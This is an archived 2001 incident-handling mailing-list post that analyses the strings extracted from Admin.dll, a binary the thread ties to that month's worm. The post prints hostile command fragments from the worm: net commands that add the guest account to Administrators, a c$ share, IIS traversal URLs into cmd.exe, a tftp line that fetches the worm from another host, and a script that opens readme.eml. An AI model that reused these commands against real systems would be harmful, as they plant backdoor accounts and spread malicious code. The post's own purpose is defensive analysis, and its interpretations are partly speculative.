Admin.dll (strings ./Admin.dll)

From: w1re p4ir (w1rep4irat_private)
Date: Tue Sep 18 2001 - 10:52:34 PDT

Next message: Enrique A. Compañ Gzz.: "New Worm"

Previous message: Aj Effin Reznor: "More on the Worm"
Next in thread: Isherwood Jeff C Contr AFRL/IFOSS: "RE: Admin.dll (strings ./Admin.dll)"
Next in thread: Robert D.: "Re: Admin.dll (strings ./Admin.dll)"
Reply: Isherwood Jeff C Contr AFRL/IFOSS: "RE: Admin.dll (strings ./Admin.dll)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Ok folks here's what i've come up with when running strings against Admin.dll, I'm by no means a forensics specialist, but here is what i have concluded.
I'm sure some of this might be totally off but it is what I think it's attempting to do: 
First I noticed it setting up:
Concept Virus(CV) V.5, Copyright(C)2001  R.P.China

It then shows the mime headers and the content type:
Content-Type: audio/x-wav;
        name="readme.exe"

This is obviously part of the readme.eml. Next we see it making some changes or reading of the registry:

[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\

It also seems to add the user "guest" to the Administrator group.

user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add

After this we notice the binary directories and unicode character sets to be used in compromising the other hosts.

/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll

This is an interesting part it must be net using to the localmachine(maybe) with the user guest (who is now an administrator) and tftping the Admin.dll and putting it in the current directory and all Drive Roots C:, D: ect.



<html><script language="JavaScript">window.open("readme.eml", null, "resizable=n
o,top=6000,left=6000")</script></html>
/Admin.dll

Here's where it inserts the javascript to open the evil readme.eml mime Buffer overflow.



This im' not too sure of what its trying to do. I imagine it's setting up the email information:
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
 -dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
 -qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe

________________________________________________________
The Best News Source On The Web - http://www.disinfo.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Enrique A. Compañ Gzz.: "New Worm"
Previous message: Aj Effin Reznor: "More on the Worm"
Next in thread: Isherwood Jeff C Contr AFRL/IFOSS: "RE: Admin.dll (strings ./Admin.dll)"
Next in thread: Robert D.: "Re: Admin.dll (strings ./Admin.dll)"
Reply: Isherwood Jeff C Contr AFRL/IFOSS: "RE: Admin.dll (strings ./Admin.dll)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 14:03:23 PDT